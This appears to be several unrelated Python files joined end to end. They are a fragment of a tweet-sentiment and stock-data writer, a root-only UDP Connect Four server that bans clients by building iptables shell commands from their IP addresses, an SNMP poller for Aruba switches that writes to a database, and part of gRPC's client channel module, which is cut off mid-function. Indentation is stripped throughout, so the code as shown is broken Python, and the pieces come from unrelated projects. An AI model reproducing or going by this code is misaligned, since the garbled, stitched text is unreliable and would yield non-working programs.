tableWriter_live.write_row(t['text'], float(compound_live), float(negative_live), float(neutral_live), float(positive_live),to_datetime(dateTime_live), int(retweet_count_live), float(c_live), float(h_live), float(l_live), float(o_live), float(v_live))
i = i + 1
except:
print('error/NoneType')
print("finished writing rows: ", i)
return max_id
def thread_func_live():
global max_id
for i in range(0, time_alive*60, time_to_sleep):
query_params = get_query_params_live(search_term, max_id)
all_text = get_tweets(query_params)
max_id = write_data(all_text)
time.sleep(time_to_sleep)
tableWriter_live = DynamicTableWriter(
{"Text":dht.string, "Compound":dht.double, "Negative":dht.double, "Neutral":dht.double, "Positive":dht.double, "DateTime":dht.DateTime, "Retweet_count":dht.int_, "Close":dht.float64, "High":dht.float64, "Low":dht.float64, "Open":dht.float64, "Volume":dht.float64})
thread_live = Thread(target=thread_func_live)
thread_live.start()
live_data = tableWriter_live.table
|
server.py
|
import socket
import asyncio
import threading
import time
import numpy
import os
inGame = False
class NonNegativeNumpyIndex:
def __init__(self, numpyArray):
self.array = numpyArray
def __call__(self, rowOrSearchVal = None, col = None, value = None):
# print("A")
if (value != None):
self.array[rowOrSearchVal][col] = value
elif (col != None):
if ((rowOrSearchVal < 0) | (col < 0)):
raise Exception("IndexOutOfBounds: No negative numbers permitted.")
else:
return self.array[rowOrSearchVal][col]
else:
return (self.array == rowOrSearchVal).sum()
def NormalGame(client1, client2):
global inGamePacketQueue
map = NonNegativeNumpyIndex(numpy.full(shape=(6,7), fill_value=-1))
_a = {}
_a[0], _a[1] = client1, client2
s.sendto(b'0', _a[0])
s.sendto(b'1', _a[1])
while True:
for sock in range(2):
while inGamePacketQueue[_a[sock]] == b'':
time.sleep(0.01)
if inGamePacketQueue[_a[(sock + 1) % 2]] == b'lg':
try:
s.sendto(b'lg', _a[sock])
except:
pass
del inGame[inGame.index(_a[0])]
del inGame[inGame.index(_a[1])]
del inGamePacketQueue[_a[0]]
del inGamePacketQueue[_a[1]]
return 0
slot = inGamePacketQueue[_a[sock]]
inGamePacketQueue[_a[sock]] = b''
if slot == b'lg':
try:
s.sendto(b'lg', _a[(sock + 1) % 2])
except:
pass
del inGame[inGame.index(_a[0])]
del inGame[inGame.index(_a[1])]
del inGamePacketQueue[_a[0]]
del inGamePacketQueue[_a[1]]
return 0
try:
dcSlot = slot.decode()
map(int(dcSlot[0]), int(dcSlot[1]), sock)
stop = False
except:
s.sendto(b'BANNED', _a[sock])
os.system("iptables -A INPUT -s " + _a[sock][0] + " -j DROP")
print("\033[93m" + _a[sock][0] + " has been BANNED")
try:
s.sendto(b'lg', _a[(sock + 1) % 2])
except:
pass
del inGame[inGame.index(_a[0])]
del inGame[inGame.index(_a[1])]
del inGamePacketQueue[_a[0]]
del inGamePacketQueue[_a[1]]
return 0
print(map.array)
for r in range(0, 6):
for c in range(0,7):
if map(r,c) != -1:
try:
if (map(r,c) == map(r + 1,c) == map(r + 2,c) == map(r + 3,c)):
stop = True
print(1)
break
except:
pass
try:
if (map(r,c) == map(r - 1,c) == map(r - 2,c) == map(r - 3,c)):
stop = True
print(2)
break
except:
pass
try:
if (map(r,c) == map(r,c + 1) == map(r,c + 2) == map(r,c + 3)):
stop = True
print(3)
break
except:
pass
try:
if (map(r,c) == map(r,c - 1) == map(r,c - 2) == map(r,c - 3)):
stop = True
print(4)
break
except:
pass
try:
if (map(r,c) == map(r + 1,c + 1) == map(r + 2,c + 2) == map(r + 3,c + 3)):
stop = True
print(5)
break
except:
pass
try:
if (map(r,c) == map(r + 1,c - 1) == map(r + 2,c - 2) == map(r + 3,c - 3)):
stop = True
print(6)
break
except:
pass
try:
if (map(r,c) == map(r - 1,c - 1) == map(r - 2,c - 2) == map(r - 3,c - 3)):
print(map(r - 1,c - 1))
stop = True
print(7)
break
except:
pass
try:
if (map(r,c) == map(r - 1,c + 1) == map(r - 2,c + 2) == map(r - 3,c + 3)):
stop = True
print(8)
break
except:
pass
if (map(-1) == 0):
stop = True
s.sendto(b'd', _a[(sock + 1) % 2])
s.sendto(b'd', _a[sock])
return 0
if stop:
break
s.sendto(slot, _a[(sock + 1) % 2])
if stop:
del inGame[inGame.index(_a[0])]
del inGame[inGame.index(_a[1])]
del inGamePacketQueue[_a[0]]
del inGamePacketQueue[_a[1]]
s.sendto(b'l', _a[(sock + 1) % 2])
s.sendto(b'w', _a[sock])
return 0
if os.geteuid() != 0:
print("Root like permissions not found, exiting...")
quit()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', 6543))
accepting = True
warned = {}
inGame = []
inGamePacketQueue = {}
gameQueue = {b'0':[]} # , b'1':[], b'2':[] ... to be added later
classDict = {b'0':NormalGame}
gameCount = 0
gameTHRESHOLD = 100
def acceptor():
while True:
data, addr = s.recvfrom(2)
try:
if (data == b'lg') & (addr in gameQueue[b'0']):
del gameQueue[b'0'][gameQueue[b'0'].index(addr)]
elif (addr not in inGame) & (addr not in gameQueue[b'0']) & accepting:
gameQueue[data].append(addr)
else:
inGamePacketQueue[addr] = data
except:
if (addr not in inGame) & (addr not in gameQueue[b'0']):
if addr in warned:
warned[addr] += 1
s.sendto(b'warning, YOU WILL BE BANNED', addr)
print("\033[94m" + addr[0] + " has been warned")
else:
warned[addr] = 1
s.sendto(b'warning, YOU WILL BE BANNED', addr)
print("\033[94m" + addr[0] + " has been warned")
if warned[addr] > 2:
s.sendto(b'BANNED', addr)
os.system("iptables -A INPUT -s " + addr[0] + " -j DROP")
print("\033[93m" + addr[0] + " has been BANNED")
del warned[addr]
def dispatch():
while accepting:
for i in range(len(gameQueue)):
if len(gameQueue[bytes(str(i), "utf-8")]) > 1:
threading.Thread(target=classDict[bytes(str(i), "utf-8")], args=(gameQueue[bytes(str(i), "utf-8")][0], gameQueue[bytes(str(i), "utf-8")][1])).start()
inGame.append(gameQueue[bytes(str(i), "utf-8")][0])
inGame.append(gameQueue[bytes(str(i), "utf-8")][1])
inGamePacketQueue[gameQueue[bytes(str(i), "utf-8")][0]] = b''
inGamePacketQueue[gameQueue[bytes(str(i), "utf-8")][1]] = b''
del gameQueue[bytes(str(i), "utf-8")][0]
del gameQueue[bytes(str(i), "utf-8")][0]
time.sleep(0.01)
threading.Thread(target=acceptor).start()
threading.Thread(target=dispatch).start()
while True:
shell = input()
if "e" in shell:
accepting = False
if "k" in shell:
print("\033[91m" + "KILLING SERVER... ")
accepting = False
s.shutdown(socket.SHUT_RDWR)
s.close()
break
|
snmp_aruba_agent.py
|
#!/usr/bin/python3 -tt
# -*- coding: utf-8 -*-
from twisted.internet import task
from twisted.python import log
import subprocess
import datetime
import threading
import time
import re
from sqlalchemy import and_
from sqlalchemy.orm.exc import NoResultFound
__all__ = ['SNMPArubaAgent']
class SNMPArubaAgent(object):
status_oid = '1.3.6.1.2.1.1'
oid_engine_time = '1.3.6.1.6.3.10.2.1.3'
inter_oids = {
'Speed': ('1.3.6.1.2.1.31.1.1.1.15', '#IF-MIB::ifSpeed.4227913 = Gauge32: 1000000000', 'Gauge32: ', 1),
'AdminStatus': ('1.3.6.1.2.1.2.2.1.7', '#IF-MIB::ifAdminStatus.4227913 = INTEGER: up(1)', 'INTEGER: ', 1),
'Description': (
'1.3.6.1.2.1.2.2.1.2', '#IF-MIB::ifDescr.4227913 = STRING: GigabitEthernet1/0/37', 'STRING: ', 1
),
'OperStatus': ('1.3.6.1.2.1.2.2.1.8', '#IF-MIB::ifOperStatus.4227913 = INTEGER: up(1)', 'INTEGER: ', 1),
'LastChange': (
'1.3.6.1.2.1.2.2.1.9', '#IF-MIB::ifLastChange.4227913 = Timeticks: (12849) 8 days, 17:10:01.11', '', 1
),
'Name': (
'1.3.6.1.2.1.31.1.1.1.1', '#IF-MIB::ifName.4227913 = STRING: GigabitEthernet1/0/37', 'STRING: ', 1
),
'mapping-1': (
'1.3.6.1.2.1.17.1.4.1.2', '#mapping - SNMPv2-SMI::mib-2.17.1.4.1.2.37 = INTEGER: 4227913',
'INTEGER: ', 2
),
'Vlan': (
'1.3.6.1.2.1.17.7.1.4.5.1.1', '#SNMPv2-SMI::mib-2.17.7.1.4.5.1.1.4227913 = Gauge32: 13', 'Gauge32: ', 1
),
'Alias': (
'1.3.6.1.2.1.31.1.1.1.18', '#1.3.6.1.2.1.31.1.1.1.18.59 = STRING: S1.3.043', 'STRING: ', 1
),
'mapping-2': (
'1.3.6.1.2.1.17.4.3.1.2',
'#mapping - SNMPv2-SMI::mib-2.17.7.1.2.2.1.2.13.24.169.5.52.121.109 = INTEGER: 37', 'INTEGER: ', 3
),
}
def __init__(self, db, snmpwalk_path, update_period, query_timeout):
self.db = db
self.snmpwalk_path = snmpwalk_path
self.update_period = int(update_period)
self.query_timeout = int(query_timeout)
def start(self):
"""Start the periodic checking."""
self.periodic = task.LoopingCall(self.update)
self.periodic.start(self.update_period, True)
def get_switch_status(self, ip, version, community, timeout):
bashCommand = self.snmpwalk_path + ' -t {0} -Cc -c {1} -v {2} -ObentU {3} {4}'
# oid = '1.3.6.1.2.1.1'
oid = self.status_oid
# 1.3.6.1.6.3.10.2.1.3 - snmp engine uptime in secs max value cca 50000 days
# 1.3.6.1.2.1.1.3.0 - sysuptime in Timeticks max value cca 500 days
informations = {
'1.0': ('1.3.6.1.2.1.1.1.0', 'description', 'STRING: '),
'2.0': ('1.3.6.1.2.1.1.2.0', 'objectID', 'OID: '),
'3.0': ('1.3.6.1.2.1.1.3.0', 'uptime', ''),
'4.0': ('1.3.6.1.2.1.1.4.0', 'contact', 'STRING: '),
'5.0': ('1.3.6.1.2.1.1.5.0', 'name', 'STRING: '),
'6.0': ('1.3.6.1.2.1.1.6.0', 'location', 'STRING: '),
'7.0': ('1.3.6.1.2.1.1.7.0', 'services', 'INTEGER: '),
}
data = {}
command = bashCommand.format(timeout, community, version, ip, oid)
# ~ timeout - diferent (oid, ip) need diferent timeout => problem
output = subprocess.check_output(command.split(), timeout=self.query_timeout).decode('utf-8')
for line in output.split('\n')[:-1]:
prefix_lenght = len(oid) + 2
parsed_value = line[prefix_lenght:].split(' = ')
if parsed_value[0] in informations:
key = informations[parsed_value[0]][1]
data_prefix = informations[parsed_value[0]][2]
val = parsed_value[1][len(data_prefix):]
data[key] = val
# oid_engine_time = '1.3.6.1.6.3.10.2.1.3'
oid_engine_time = self.oid_engine_time
command = bashCommand.format(timeout, community, version, ip, oid_engine_time)
output = subprocess.check_output(command.split(), timeout=self.query_timeout).decode('utf-8')
parsed_value = output.split('\n')[0].split(' = INTEGER: ')
data['engineUptime'] = parsed_value[1]
return data
def get_interfaces(self, ip, version, community, timeout):
bashCommand = self.snmpwalk_path + ' -t {0} -Cc -c {1} -v {2} -ObentU {3} {4}'
oids = self.inter_oids
data = {}
ordered_oids = [('mapping-2', oids['mapping-2']), ]
for key, val in oids.items():
if key != 'mapping-2':
ordered_oids.append((key, val))
for key, val in ordered_oids:
oid = val[0]
command = bashCommand.format(timeout, community, version, ip, oid)
# ~ timeout - diferent (oid, ip) need diferent timeout => problem
output = subprocess.check_output(command.split(), timeout=self.query_timeout).decode('utf-8')
data[key] = []
for x in output.split('\n')[:-1]:
prefix_lenght = len(val[0]) + 2
parsed_value = x[prefix_lenght:].split(' = ' + val[2])
data[key].append(parsed_value)
return self.join_data(data)
def join_data(self, data):
oids = self.inter_oids
mapped_vals = {}
for prop, oid in oids.items():
if not oid[3] in mapped_vals:
mapped_vals[oid[3]] = {}
for val in data[prop]:
if not val[0] in mapped_vals[oid[3]] and len(val) is 2:
mapped_vals[oid[3]][val[0]] = {}
if len(val) is 2:
mapped_vals[oid[3]][val[0]][prop] = val[1]
for key, val in mapped_vals[3].items():
if 'mapping-2' in val:
if val['mapping-2'] in mapped_vals[2]:
if not ('MACs' in mapped_vals[2][val['mapping-2']]):
mapped_vals[2][val['mapping-2']]['MACs'] = []
tmp_MAC = key.split('.')
MAC = "{:02X} {:02X} {:02X} {:02X} {:02X} {:02X}".format(
int(tmp_MAC[0]), int(tmp_MAC[1]), int(tmp_MAC[2]),
int(tmp_MAC[3]), int(tmp_MAC[4]), int(tmp_MAC[5])
)
mapped_vals[2][val['mapping-2']]['MACs'].append(MAC)
for key, val in mapped_vals[2].items():
if not ('MACs' in val):
val['MACs'] = []
if val['mapping-1'] in mapped_vals[1]:
mapped_vals[1][val['mapping-1']]['MACs'] = val['MACs']
for key, val in mapped_vals[1].items():
if not ('MACs' in val):
val['MACs'] = []
return mapped_vals[1]
def save_to_db(self, switch, data):
sw_info = data['switch']
self.save_if_to_db(switch, data['interfaces'], sw_info['uptime'])
self.save_if_topology_to_db(switch, data['interfaces'])
switch.uptime = '{} seconds'.format(int(sw_info['engineUptime']))
switch.sys_description = sw_info['description']
switch.sys_objectID = sw_info['objectID']
switch.sys_contact = sw_info['contact']
switch.sys_name = sw_info['name']
switch.sys_location = sw_info['location']
switch.sys_services = int(sw_info['services'])
switch.last_update = datetime.datetime.now()
self.db.commit()
def process_speed(self, data, name, admin_status, oper_status):
# link (adm) down, speed auto => non zero value
if admin_status != 1 or oper_status != 1:
return None
speed = int(data)
if speed == 0:
return None
return speed
def process_vlan(self, data):
vlan = int(data)
if vlan < 1 or vlan > 4096:
vlan = None
return vlan
def process_last_change(self, data, sw_uptime):
last_change = int(data)
uptime = int(sw_uptime)
if last_change < 1:
return None
if last_change > uptime:
# limitation of SNMP Timeticks datatype (max value = 4294967295 eq. 500 days)
uptime += 4294967296
return '{} seconds'.format((uptime - last_change) // 100)
def save_if_topology_to_db(self, switch, data):
analyzer = self.db.analyzer.filter_by(name=switch.name).one()
for key, val in data.items():
if not re.match(r'\d+/\d+', val['Name']):
continue
unit_number, interface_number = map(int, val['Name'].split('/', 2))
where = and_(self.db.patch_panel.analyzer == analyzer.uuid,
self.db.patch_panel.pp_id_in_analyzer == unit_number)
try:
patch_panel = self.db.patch_panel.filter(where).one()
except NoResultFound:
self.db.patch_panel.insert(pp_id_in_analyzer=unit_number, analyzer=analyzer.uuid)
self.db.commit()
finally:
patch_panel = self.db.patch_panel.filter(where).one()
where = and_(self.db.port.patch_panel == patch_panel.uuid,
self.db.port.name == val['Name'])
try:
port = self.db.port.filter(where).one()
except NoResultFound:
self.db.port.insert(
patch_panel=patch_panel.uuid,
position_on_pp=interface_number,
name=val['Name'],
type='sw'
)
self.db.commit()
finally:
port = self.db.port.filter(where).one()
try:
other_port = self.db.port.filter_by(name=val['Alias']).one()
other_port.connect_to = port.uuid
port.connect_to = other_port.uuid
self.db.commit()
except NoResultFound:
pass
where = and_(self.db.sw_interface.switch == switch.uuid,
self.db.sw_interface.name == val['Name'])
interface = self.db.sw_interface.filter(where).one()
if interface.port != port.uuid:
interface.port = port.uuid
self.db.commit()
def save_if_to_db(self, switch, data, sw_uptime):
for key, val in data.items():
where = and_(self.db.sw_interface.switch == switch.uuid, self.db.sw_interface.name == val['Name'])
try:
interface = self.db.sw_interface.filter(where).one()
except NoResultFound:
self.db.sw_interface.insert(name=val['Name'], switch=switch.uuid)
self.db.commit()
update_time = datetime.datetime.now()
for key, val in data.items():
if not ('Vlan' in val):
val['Vlan'] = 0
where = and_(self.db.sw_interface.switch == switch.uuid, self.db.sw_interface.name == val['Name'])
interface = self.db.sw_interface.filter(where).one()
# SNMP up = 1, down = 2
interface.admin_status = 2 - int(val['AdminStatus'])
interface.oper_status = 2 - int(val['OperStatus'])
interface.speed = self.process_speed(
val['Speed'], val['Name'], interface.admin_status, interface.oper_status
)
interface.vlan = self.process_vlan(val['Vlan'])
interface.last_change = self.process_last_change(val['LastChange'], sw_uptime)
self.db.mac_address.filter_by(interface=interface.uuid).delete()
if interface.ignore_macs is False:
if len(val['MACs']) > 0:
self.db.last_macs_on_interface.filter_by(interface=interface.uuid).delete()
for mac in val['MACs']:
self.db.mac_address.insert(mac_address=mac, interface=interface.uuid,)
self.db.last_macs_on_interface.insert(
mac_address=mac, interface=interface.uuid, time=update_time)
try:
db_mac = self.db.last_interface_for_mac.filter(
self.db.last_interface_for_mac.mac_address == mac
).one()
db_mac.interface = interface.uuid
db_mac.time = update_time
except NoResultFound:
self.db.last_interface_for_mac.insert(
mac_address=mac, interface=interface.uuid, time=update_time
)
else:
self.db.last_macs_on_interface.filter_by(interface=interface.uuid).delete()
self.db.last_interface_for_mac.filter_by(interface=interface.uuid).delete()
self.db.commit()
def parallel_update(self, switch, output):
start = time.time()
try:
output[switch.uuid]['interfaces'] = self.get_interfaces(
switch.ip_address, switch.snmp_version,
switch.snmp_community, switch.snmp_timeout
)
output[switch.uuid]['switch'] = self.get_switch_status(
switch.ip_address, switch.snmp_version,
switch.snmp_community, switch.snmp_timeout
)
except Exception as e:
log.msg(('Error while getting data from {}({}), {}'.format(switch.name, switch.ip_address, e)))
return
log.msg('{} finished ({:.03f} s)'.format(switch.name, time.time() - start))
def update(self):
log.msg('Interface status sync started')
start = time.time()
threads = []
data = {}
for switch in self.db.switch.filter_by(enable=True, type='aruba').all():
data[switch.uuid] = {'switch': None, 'interfaces': None}
t = threading.Thread(target=self.parallel_update, args=(switch, data))
t.start()
threads.append(t)
for t in threads:
t.join()
for switch in self.db.switch.filter_by(enable=True, type='aruba').all():
if data[switch.uuid]:
try:
self.save_to_db(switch, data[switch.uuid])
except Exception as e:
log.msg(('Error during saving data from {}({}) to db, {}'.format(
switch.name, switch.ip_address, e,
)))
log.msg('Interface status sync finished ({:.03f} s)'.format(time.time() - start))
|
_channel.py
|
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Invocation-side implementation of gRPC Python."""
import logging
import sys
import threading
import time
import grpc
from grpc import _compression
from grpc import _common
from grpc import _grpcio_metadata
from grpc._cython import cygrpc
_LOGGER = logging.getLogger(__name__)
_USER_AGENT = 'grpc-python/{}'.format(_grpcio_metadata.__version__)
_EMPTY_FLAGS = 0
_UNARY_UNARY_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.send_message,
cygrpc.OperationType.send_close_from_client,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_message,
cygrpc.OperationType.receive_status_on_client,
)
_UNARY_STREAM_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.send_message,
cygrpc.OperationType.send_close_from_client,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_status_on_client,
)
_STREAM_UNARY_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_message,
cygrpc.OperationType.receive_status_on_client,
)
_STREAM_STREAM_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_status_on_client,
)
_CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE = (
'Exception calling channel subscription callback!')
_OK_RENDEZVOUS_REPR_FORMAT = ('<_Rendezvous of RPC that terminated with:\n'
'\tstatus = {}\n'
'\tdetails = "{}"\n'
'>')
_NON_OK_RENDEZVOUS_REPR_FORMAT = ('<_Rendezvous of RPC that terminated with:\n'
'\tstatus = {}\n'
'\tdetails = "{}"\n'
'\tdebug_error_string = "{}"\n'
'>')
def _deadline(timeout):
return None if timeout is None else time.time() + timeout
def _unknown_code_details(unknown_cygrpc_code, details):
return 'Server sent unknown code {} and details "{}"'.format(
unknown_cygrpc_code, details)
def _wait_once_until(condition, until):
if until is None:
condition.wait()
else:
remaining = until - time.time()
if remaining < 0:
raise grpc.FutureTimeoutError()
else:
condition.wait(timeout=remaining)
class _RPCState(object):
def __init__(self, due, initial_metadata, trailing_metadata, code, details):
self.condition = threading.Condition()
# The cygrpc.OperationType objects representing events due from the RPC's
# completion queue.
self.due = set(due)
self.initial_metadata = initial_metadata
self.response = None
self.trailing_metadata = trailing_metadata
self.code = code
self.details = details
self.debug_error_string = None
# The semantics of grpc.Future.cancel and grpc.Future.cancelled are
# slightly wonky, so they have to be tracked separately from the rest of the
# result of the RPC. This field tracks whether cancellation was requested
# prior to termination of the RPC.
self.cancelled = False
self.callbacks = []
self.fork_epoch = cygrpc.get_fork_epoch()
def reset_postfork_child(self):
self.condition = threading.Condition()
def _abort(state, code, details):
if state.code is None:
state.code = code
state.details = details
if state.initial_metadata is None:
state.initial_metadata = ()
state.trailing_metadata = ()
def _handle_event(event, state, response_deserializer):
callbacks = []
for batch_operation in event.batch_operations:
operation_type = batch_operation.type()
state.due.remove(operation_type)
if operation_type == cygrpc.OperationType.receive_initial_metadata:
state.initial_metadata = batch_operation.initial_metadata()
elif operation_type == cygrpc.OperationType.receive_message:
serialized_response = batch_operation.message()
if serialized_response is not None:
response = _common.deserialize(serialized_response,
response_deserializer)
if response is None:
details = 'Exception deserializing response!'
_abort(state, grpc.StatusCode.INTERNAL, details)
else:
state.response = response
elif operation_type == cygrpc.OperationType.receive_status_on_client:
state.trailing_metadata = batch_operation.trailing_metadata()
if state.code is None:
code = _common.CYGRPC_STATUS_CODE_TO_STATUS_CODE.get(
batch_operation.code())
if code is None:
state.code = grpc.StatusCode.UNKNOWN
state.details = _unknown_code_details(
code, batch_operation.details())
else:
state.code = code
state.details = batch_operation.details()
state.debug_error_string = batch_operation.error_string()
callbacks.extend(state.callbacks)
state.callbacks = None
return callbacks
def _event_handler(state, response_deserializer):
def handle_event(event):
with state.condition:
callbacks = _handle_event(event, state, response_deserializer)
state.condition.notify_all()
done = not state.due
for callback in callbacks:
callback()
return done and state.fork_epoch >= cygrpc.get_fork_epoch()
return handle_event
#pylint: disable=too-many-statements
def _consume_request_iterator(request_iterator, state, call, request_serializer,
event_handler):
if cygrpc.is_fork_support_enabled():
condition_wait_timeout = 1.0
else:
condition_wait_timeout = None
def consume_request_iterator(): # pylint: disable=too-many-branches
while True:
return_from_user_request_generator_invoked = False
try:
# The thread may die in user-code. Do not block fork for this.
cygrpc.enter_user_request_generator()
request = next(request_iterator)
except StopIteration:
break
except Exception: # pylint: disable=broad-except
cygrpc.return_from_user_request_generator()
return_from_user_request_generator_invoked = True
code = grpc.StatusCode.UNKNOWN
details = 'Exception iterating requests!'
_LOGGER.exception(details)
call.cancel(_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
details)
_abort(state, code, details)
return
finally:
if not return_from_user_request_generator_invoked:
cygrpc.return_from_user_request_generator()
serialized_request = _common.serialize(request, request_serializer)
with state.condition:
if state.code is None and not state.cancelled:
if serialized_request is None:
code = grpc.StatusCode.INTERNAL
details = 'Exception serializing request!'
call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
details)
_abort(state, code, details)
return
else:
operations = (cygrpc.SendMessageOperation(
serialized_request, _EMPTY_FLAGS),)
operating = call.operate(operations, event_handler)
if operating:
state.due.add(cygrpc.OperationType.send_message)
else:
return
while True:
state.condition.wait(condition_wait_timeout)
cygrpc.block_if_fork_in_progress(state)
if state.code is None:
if cygrpc.OperationType.send_message not in state.due:
break
else:
return
else:
return
with state.condition:
if state.code is None:
operations = (
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),)
operating = call.operate(operations, event_handler)
if operating:
state.due.add(cygrpc.OperationType.send_close_from_client)
consumption_thread = cygrpc.ForkManagedThread(
target=consume_request_iterator)
consumption_thread.setDaemon(True)
consumption_thread.start()
class _Rendezvous(grpc.RpcError, grpc.Future, grpc.Call): # pylint: disable=too-many-ancestors
def __init__(self, state, call, response_deserializer, deadline):
super(_Rendezvous, self).__init__()
self._state = state
self._call = call
self._response_deserializer = response_deserializer
self._deadline = deadline
def cancel(self):
with self._state.condition:
if self._state.code is None:
code = grpc.StatusCode.CANCELLED
details = 'Locally cancelled by application!'
self._call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code], details)
self._state.cancelled = True
_abort(self._state, code, details)
self._state.condition.notify_all()
return False
def cancelled(self):
with self._state.condition:
return self._state.cancelled
def running(self):
with self._state.condition:
return self._state.code is None
def done(self):
with self._state.condition:
return self._state.code is not None
def result(self, timeout=None):
until = None if timeout is None else time.time() + timeout
with self._state.condition:
while True:
if self._state.code is None:
_wait_once_until(self._state.condition, until)
elif self._state.code is grpc.StatusCode.OK:
return self._state.response
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
raise self
def exception(self, timeout=None):
until = None if timeout is None else time.time() + timeout
with self._state.condition:
while True:
if self._state.code is None:
_wait_once_until(self._state.condition, until)
elif self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
return self
def traceback(self, timeout=None):
until = None if timeout is None else time.time() + timeout
with self._state.condition:
while True:
if self._state.code is None:
_wait_once_until(self._state.condition, until)
elif self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
try:
raise self
except grpc.RpcError:
return sys.exc_info()[2]
def add_done_callback(self, fn):
with self._state.condition:
if self._state.code is None:
self._state.callbacks.append(lambda: fn(self))
return
fn(self)
def _next(self):
with self._state.condition:
if self._state.code is None:
event_handler = _event_handler(self._state,
self._response_deserializer)
operating = self._call.operate(
(cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),),
event_handler)
if operating:
self._state.due.add(cygrpc.OperationType.receive_message)
elif self._state.code is grpc.StatusCode.OK:
raise StopIteration()
else:
raise self
while True:
self._state.condition.wait()
if self._state.response is not None:
response = self._state.response
self._state.response = None
return response
elif cygrpc.OperationType.receive_message not in self._state.due:
if self._state.code is grpc.StatusCode.OK:
raise StopIteration()
elif self._state.code is not None:
raise self
def __iter__(self):
return self
def __next__(self):
return self._next()
def next(self):
return self._next()
def is_active(self):
with self._state.condition:
return self._state.code is None
def time_remaining(self):
if self._deadline is None:
return None
else:
return max(self._deadline - time.time(), 0)
def add_callback(self, callback):
with self._state.condition:
if self._state.callbacks is None:
return False
else:
self._state.callbacks.append(callback)
return True
def initial_metadata(self):
with self._state.condition:
while self._state.initial_metadata is None:
self._state.condition.wait()
return self._state.initial_metadata
def trailing_metadata(self):
with self._state.condition:
while self._state.trailing_metadata is None:
self._state.condition.wait()
return self._state.trailing_metadata
def code(self):
with self._state.condition:
while self._state.code is None:
self._state.condition.wait()
return self._state.code
def details(self):
with self._state.condition:
while self._state.details is None:
self._state.condition.wait()
return _common.decode(self._state.details)
def debug_error_string(self):
with self._state.condition:
while self._state.debug_error_string is None:
self._state.condition.wait()
return _common.decode(self._state.debug_error_string)
def _repr(self):
with self._state.condition:
if self._state.code is None:
return '<_Rendezvous object of in-flight RPC>'
elif self._state.code is grpc.StatusCode.OK:
return _OK_RENDEZVOUS_REPR_FORMAT.format(
self._state.code, self._state.details)
else:
return _NON_OK_RENDEZVOUS_REPR_FORMAT.format(
self._state.code, self._state.details,
self._state.debug_error_string)
def __repr__(self):
return self._repr()
def __str__(self):
return self._repr()
def __del__(self):
with self._state.condition:
if self._state.code is None:
self._state.code = grpc.StatusCode.CANCELLED
self._state.details = 'Cancelled upon garbage collection!'
self._state.cancelled = True
self._call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[self._state.code],
self._state.details)
self._state.condition.notify_all()
def _start_unary_request(request, timeout, request_serializer):
deadline = _deadline(timeout)
serialized_request = _common.serialize(request, request_serializer)
if serialized_request is None:
state = _RPCState((), (), (), grpc.StatusCode.INTERNAL,
'Exception serializing request!')
rendezvous = _Rendezvous(state, None, None, deadline)
return deadline, None, rendezvous
else:
return deadline, serialized_request, None
def _end_unary_response_blocking(state, call, with_call, deadline):
if state.code is grpc.StatusCode.OK:
if with_call:
rendezvous = _Rendezvous(state, call, None, deadline)
return state.response, rendezvous
else:
return state.response
else:
raise _Rendezvous(state, None, None, deadline)
def _stream_unary_invocation_operationses(metadata, initial_metadata_flags):
return (
(
cygrpc.SendInitialMetadataOperation(metadata,
initial_metadata_flags),
cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
def _stream_unary_invocation_operationses_and_tags(metadata,
initial_metadata_flags):
return tuple((
operations,
None,
)
for operations in _stream_unary_invocation_operationses(
metadata, initial_metadata_flags))
def _determine_deadline(user_deadline):
parent_deadline = cygrpc.get_deadline_from_context()
if parent_deadline is None and user_deadline is None:
return None
elif parent_deadline is not None and user_deadline is None:
return parent_deadline
elif user_deadline is not None and parent_deadline is None:
return user_deadline
else:
return min(parent_deadline, user_deadline)
class _UnaryUnaryMultiCallable(grpc.UnaryUnaryMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def _prepare(self, request, timeout, metadata, wait_for_ready, compression):
deadline, serialized_request, rendezvous = _start_unary_request(
request, timeout, self._request_serializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
if serialized_request is None:
return None, None, None, rendezvous
else:
state = _RPCState(_UNARY_UNARY_INITIAL_DUE, None, None, None, None)
operations = (
cygrpc.SendInitialMetadataOperation(augmented_metadata,
initial_metadata_flags),
cygrpc.SendMessageOperation(serialized_request, _EMPTY_FLAGS),
